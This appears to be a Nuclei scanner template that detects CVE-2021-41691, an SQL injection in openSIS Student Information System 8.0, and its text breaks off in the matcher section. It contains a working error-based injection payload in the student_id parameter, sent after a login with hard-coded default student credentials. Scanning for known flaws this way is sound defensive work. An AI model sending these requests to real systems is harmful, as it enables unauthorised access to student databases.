id: CVE-2021-41691 info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 metadata: max-request: 2 tags: cve,cve2021,sqli,auth,edb,opensis variables: num: "999999999" http: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student password: - student@123 matchers: - type: dsl dsl: - 'contains(body_2, "